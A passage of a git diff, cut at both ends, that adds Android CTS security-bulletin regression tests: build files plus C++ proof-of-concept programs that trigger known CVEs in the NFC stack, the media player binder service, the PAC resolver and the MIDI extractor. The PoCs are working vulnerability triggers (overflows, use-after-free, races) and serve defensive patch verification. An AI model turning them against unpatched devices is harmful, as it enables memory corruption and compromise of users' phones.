"system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp new file mode 100644 index 00000000000..f94ee94d10f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "nfa_hci_defs.h" +#include "nfa_hci_int.h" +#define SIZE 16 + +extern tNFA_HCI_CB nfa_hci_cb; + +int main() { + nfa_hci_cb.cmd_sent = NFA_HCI_ANY_GET_PARAMETER; + nfa_hci_cb.param_in_use = NFA_HCI_HOST_LIST_INDEX; + uint8_t data_len = SIZE * 6; + uint8_t *data = (uint8_t *)malloc(SIZE); + if (!data) { + return EXIT_FAILURE; + } + nfa_hci_handle_admin_gate_rsp(data, data_len); + free(data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp index f388f89ef39..720a76d2b9d 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp @@ -20,135 +20,60 @@ #define MAX_PARAMETER_SETS (9) #define MAX_NUM_OTT (5) - -#define RETURN_EXIT_FAILURE_IF_NULL(ptr) \ - { \ - if (!ptr) { \ - return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_FAILURE); \ - } \ - } +#define ARR_SIZE (16) typedef signed char SCHAR; -int freeAllocatedMemoryAndReturn(SPATIAL_BS_FRAME *frame, spatialDec *decoder, - int errorCode) { - if (frame) { - if (frame->CLDLosslessData) { - for (int i = 0; i < MAX_NUM_OTT; ++i) { - if ((&frame->CLDLosslessData[i])->state) { - free((&frame->CLDLosslessData[i])->state); - (&frame->CLDLosslessData[i])->state = nullptr; - } - } - free(frame->CLDLosslessData); - frame->CLDLosslessData = nullptr; - } - if (frame->ICCLosslessData) { - free(frame->ICCLosslessData); - frame->ICCLosslessData = nullptr; - } - if (frame->IPDLosslessData) { - free(frame->IPDLosslessData); - frame->IPDLosslessData = nullptr; - } - free(frame); - frame = nullptr; - } - - if (decoder) { - if (decoder->pConfigCurrent) { - free(decoder->pConfigCurrent); - decoder->pConfigCurrent = nullptr; - } - if (decoder->ottCLDidxPrev) { - free(decoder->ottCLDidxPrev); - decoder->ottCLDidxPrev = nullptr; - } - if (decoder->smgTime) { - free(decoder->smgTime); - decoder->smgTime = nullptr; - } - if (decoder->smgData) { - free(decoder->smgData); - decoder->smgData = nullptr; - } - if (decoder->smoothState) { - free(decoder->smoothState); - decoder->smoothState = nullptr; - } - free(decoder); - decoder = nullptr; - } - return errorCode; -} - int main() { - spatialDec *decoder = (spatialDec *)malloc(sizeof(spatialDec)); - if (!decoder) { - return EXIT_FAILURE; - } - SPATIAL_BS_FRAME *frame = - (SPATIAL_BS_FRAME *)malloc(sizeof(SPATIAL_BS_FRAME)); + spatialDec decoder; + memset(&decoder, 0x0, sizeof(spatialDec)); - RETURN_EXIT_FAILURE_IF_NULL(frame); - memset(frame, 0x00, sizeof(SPATIAL_BS_FRAME)); + decoder.numOttBoxes = MAX_NUM_OTT; - RETURN_EXIT_FAILURE_IF_NULL(decoder); - memset(decoder, 0x00, sizeof(spatialDec)); + SPATIAL_SPECIFIC_CONFIG pConfigCurrent; + memset(&pConfigCurrent, 0x0, sizeof(SPATIAL_SPECIFIC_CONFIG)); + decoder.pConfigCurrent = &pConfigCurrent; - size_t allocSize = sizeof(LOSSLESSDATA) * MAX_NUM_OTT * MAX_NUM_PARAMETERS; + SCHAR ottCLDidxPrev[ARR_SIZE] = {}; + decoder.ottCLDidxPrev = (SCHAR **)&ottCLDidxPrev; - frame->CLDLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->CLDLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + int smgTime = 1; + decoder.smgTime = &smgTime; - frame->ICCLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->ICCLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + UCHAR smgData[ARR_SIZE] = {}; + decoder.smgData = (UCHAR **)&smgData; - frame->IPDLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->IPDLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + SMOOTHING_STATE smoothState; + memset(&smoothState, 0x0, sizeof(SMOOTHING_STATE)); + decoder.smoothState = &smoothState; - frame->numParameterSets = MAX_PARAMETER_SETS; - - for (int i = 0; i < MAX_NUM_OTT; ++i) { - (&frame->CLDLosslessData[i])->state = nullptr; - for (int j = 0; j < MAX_PARAMETER_SETS; ++j) { - (&frame->CLDLosslessData[i])->bsXXXDataMode[j] = 2; - } - (&frame->CLDLosslessData[i])->state = - (LOSSLESSSTATE *)malloc(sizeof(LOSSLESSSTATE)); - RETURN_EXIT_FAILURE_IF_NULL((&frame->CLDLosslessData[i])->state); - memset((&frame->CLDLosslessData[i])->state, 0x00, sizeof(LOSSLESSSTATE)); - } + decoder.arbitraryDownmix = 0; + (decoder.concealInfo).concealState = SpatialDecConcealState_Ok; - decoder->numOttBoxes = MAX_NUM_OTT; + const size_t allocSize = MAX_NUM_OTT * MAX_NUM_PARAMETERS; - decoder->pConfigCurrent = - (SPATIAL_SPECIFIC_CONFIG *)malloc(sizeof(SPATIAL_SPECIFIC_CONFIG)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->pConfigCurrent); - memset(decoder->pConfigCurrent, 0x00, sizeof(SPATIAL_SPECIFIC_CONFIG)); + SPATIAL_BS_FRAME frame; + memset(&frame, 0x0, sizeof(SPATIAL_BS_FRAME)); - decoder->ottCLDidxPrev = (SCHAR **)malloc(sizeof(SCHAR *)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->ottCLDidxPrev); - memset(decoder->ottCLDidxPrev, 0x00, sizeof(SCHAR *)); + frame.numParameterSets = MAX_PARAMETER_SETS; - decoder->smgTime = (int *)malloc(sizeof(int)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smgTime); - memset(decoder->smgTime, 0x00, sizeof(int)); + LOSSLESSDATA CLDLosslessData[allocSize] = {}; + frame.CLDLosslessData = CLDLosslessData; - decoder->smgData = (UCHAR **)malloc(sizeof(UCHAR *)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smgData); - memset(decoder->smgData, 0x00, sizeof(UCHAR *)); + LOSSLESSDATA ICCLosslessData[allocSize] = {}; + frame.ICCLosslessData = ICCLosslessData; - decoder->smoothState = (SMOOTHING_STATE *)malloc(sizeof(SMOOTHING_STATE)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smoothState); - memset(decoder->smoothState, 0x00, sizeof(SMOOTHING_STATE)); + LOSSLESSDATA IPDLosslessData[allocSize] = {}; + frame.IPDLosslessData = IPDLosslessData; - decoder->arbitraryDownmix = 0; - (decoder->concealInfo).concealState = SpatialDecConcealState_Ok; + for (int i = 0; i < MAX_NUM_OTT; ++i) { + for (int j = 0; j < MAX_PARAMETER_SETS; ++j) { + (frame.CLDLosslessData[i]).bsXXXDataMode[j] = 2; + } + LOSSLESSSTATE lossLessState; + (frame.CLDLosslessData[i]).state = &lossLessState; + } - SpatialDecDecodeFrame(decoder, frame); - return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_SUCCESS); + SpatialDecDecodeFrame(&decoder, &frame); + return EXIT_SUCCESS; } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp new file mode 100644 index 00000000000..dbb07bc0870 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0006", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp new file mode 100644 index 00000000000..e90150e9c43 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp @@ -0,0 +1,126 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +// borrowed from rw_i93.cc +#define RW_I93_FORMAT_DATA_LEN 8 + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t* p_uid); +void* vulnerable_ptr; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void* GKI_getbuf(uint16_t size) { + void* ptr = malloc(size); + if (size == RW_I93_FORMAT_DATA_LEN) { + vulnerable_ptr = ptr; + } + return ptr; +} + +void GKI_freebuf(void* p_buf) { + if (p_buf == vulnerable_ptr) { + free(p_buf); + } +} + +int main() { + enable_selective_overload = ENABLE_ALL; + tRW_I93_CB* p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_FORMAT; + p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY; + p_i93->block_size = I93_MAX_BLOCK_LENGH - 1; + p_data->status = NFC_STATUS_OK; + TIMER_LIST_ENT pFirst = {}; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp new file mode 100644 index 00000000000..cbe6a4e9f02 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp @@ -0,0 +1,33 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2020-0073", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include", + "system/nfc/src/gki/common", + "system/nfc/src/include", + "system/nfc/src/gki/ulinux", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp new file mode 100644 index 00000000000..d6ea4462558 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp @@ -0,0 +1,43 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include <nfc_api.h> +#include <rw_int.h> + +extern tRW_CB rw_cb; +void rw_init(void); +void rw_t2t_handle_rsp(uint8_t* p_data); +void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) { + (void)event; + (void)p_rw_data; +} + +int main() { + tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t; + rw_init(); + rw_cb.p_cback = &poc_cback; + p_t2t->state = RW_T2T_STATE_DETECT_TLV; + p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV; + p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE; + p_t2t->found_tlv = TAG_LOCK_CTRL_TLV; + p_t2t->bytes_count = 1; + p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES; + uint8_t data[T2T_READ_DATA_LEN]; + rw_t2t_handle_rsp(data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp new file mode 100644 index 00000000000..084a1fe3d2c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp @@ -0,0 +1,27 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0224", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + shared_libs: [ + "libpac", + ], + srcs: [ + "poc.cpp", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp new file mode 100644 index 00000000000..de62221ca8e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp @@ -0,0 +1,60 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <codecvt> +#include <fstream> +#include "../includes/common.h" +#include <proxy_resolver_v8_wrapper.h> + +using namespace std; + +void poc(char* raw) { + ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new(); + string u8Script(raw); + u16string u16Script = + wstring_convert<codecvt_utf8_utf16<char16_t>, char16_t> { } + .from_bytes(u8Script); + + ProxyResolverV8Handle_SetPacScript(handle, u16Script.data()); + const char16_t* spec = u"", *host = u""; + ProxyResolverV8Handle_GetProxyForURL(handle, spec, host); + ProxyResolverV8Handle_delete(handle); +} + +int main(int argc, char **argv) { + if (argc != 2) { + return EXIT_FAILURE; + } + + ifstream stream; + stream.open(argv[1]); + if (stream.rdstate() != ifstream::goodbit) { + return EXIT_FAILURE; + } + + stream.seekg(0, ios::end); + size_t size = stream.tellg(); + stream.seekg(0); + char* raw = (char*) calloc(size + 1, sizeof(char)); + stream.read(raw, size); + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + poc(raw); + } + + free(raw); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp new file mode 100644 index 00000000000..f45207f0655 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp @@ -0,0 +1,29 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0243", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libutils", + "libbinder", + "libutilscallstack", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp new file mode 100644 index 00000000000..5841427f76f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp @@ -0,0 +1,97 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> + +#include "../includes/common.h" + +using namespace android; + +typedef struct ThreadParams { + sp<IBinder> service; +} ThreadParams; + +static void *thread_getParameter(void *p) { + ThreadParams *params = (ThreadParams *)p; + int err; + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + Parcel data, reply; + data.writeInterfaceToken(params->service->getInterfaceDescriptor()); + int key = (('m') << 24 | ('t') << 16 | ('r') << 8 | ('X')); + data.writeInt32(key); + err = params->service->transact(/*GET_PARAMETER_ID*/ 31, data, &reply, 0); + if (err == EPIPE) { + break; + } + usleep(5000); + } + return nullptr; +} + +int main() { + status_t err; + sp<IServiceManager> sm = defaultServiceManager(); + String16 name(String16("media.player")); + sp<IBinder> service = sm->checkService(name); + sp<IBinder> binder = nullptr; + if (not service) { + return EXIT_FAILURE; + } + + String16 interface_name = service->getInterfaceDescriptor(); + Parcel data, reply; + data.writeInterfaceToken(interface_name); + data.writeStrongBinder(new BBinder()); + for (int i = 0; i < 1024; ++i) + data.writeInt32(1); + if (service) { + err = service->transact(/*CREATE_ID*/ 1, data, &reply, 0); + binder = reply.readStrongBinder(); + } + + if (not binder) { + return EXIT_FAILURE; + } + + pthread_t t1, t2; + + ThreadParams *params = new ThreadParams(); + params->service = binder; + pthread_create(&t1, nullptr, thread_getParameter, params); + pthread_create(&t2, nullptr, thread_getParameter, params); + + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + if (not binder) { + break; + } + Parcel data, reply; + data.writeInterfaceToken(binder->getInterfaceDescriptor()); + data.writeStrongBinder(binder); + err = binder->transact(/*SET_DATA_SOURCE_URL_ID*/ 2, data, &reply, 0); + if (err == EPIPE) { + break; + } + usleep(500000); + } + + pthread_join(t1, nullptr); + pthread_join(t2, nullptr); + delete params; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp new file mode 100644 index 00000000000..1965f503b76 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0383", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/foundation/include", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp new file mode 100644 index 00000000000..313f21a7f56 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp index 70c3eedfbf2..c32cb4a1c7e 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp @@ -27,9 +27,6 @@ cc_test { "-DENABLE_SELECTIVE_OVERLOADING", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "system/nfc/src/nfc/include/", @@ -41,7 +38,6 @@ cc_test { shared_libs: [ "libnfc-nci", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp index 1876c60bcf0..1c231b77c2f 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp @@ -22,14 +22,10 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { shared_libs: [ "libmediandk", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp new file mode 100644 index 00000000000..5cad1e4e82c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The 